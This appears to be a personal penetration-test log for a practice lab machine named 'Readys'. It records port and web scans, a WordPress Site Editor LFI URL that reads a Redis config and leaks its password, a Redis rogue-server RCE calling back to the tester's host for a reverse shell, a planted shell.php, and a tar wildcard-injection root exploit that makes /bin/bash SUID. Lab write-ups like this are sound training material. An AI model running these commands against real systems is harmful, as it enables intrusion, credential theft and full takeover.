Readys
๐งช Pentest Log: {{date:2025-08-15}}
๐ Target Information
- Machine Name: Readys
- IP Address: 192.168.152.166
- Operating System: Linux
ip=192.168.152.166
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
dirsearch -u http://$ip -r -o dirsearch.txt
wpscan --url http://$ip
Found WordPress Plugin Site Editor, Google for exploit
https://www.exploit-db.com/exploits/44340
Use the LFI found, view the redis configuration file
http://192.168.152.166/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/redis/redis.conf
Found redis password
Ready4Redis?
Port 6379
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 6379
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/Ridter/redis-rce?tab=readme-ov-file
./redis-rogue-server.py --rhost $ip --lhost 192.168.45.163 --passwd 'Ready4Redis?'
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 6379
๐งฌ Privilege Escalation
๐ค Current Access
- User: redis
- Groups: redis
- Shell Type: reverse shell
๐ Enumeration
Writeable Path:
find / -type d -maxdepth 5 -writable 2>/dev/null
Found
/run/redis
Put shell.php in /run/redis and use the RFI exploit to gain another shell
python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: Scheduled Task Exploit
- Target Binary/Service: tar
- Reference / Source: GTFOBins
๐ง Exploit Steps
- Smash to root
vim exploit.sh
#! /bin/bash
chmod +s /bin/bash
echo "" > '--checkpoint=1'
echo '' > '--checkpoint-action=exec=sh exploit.sh'
bash -p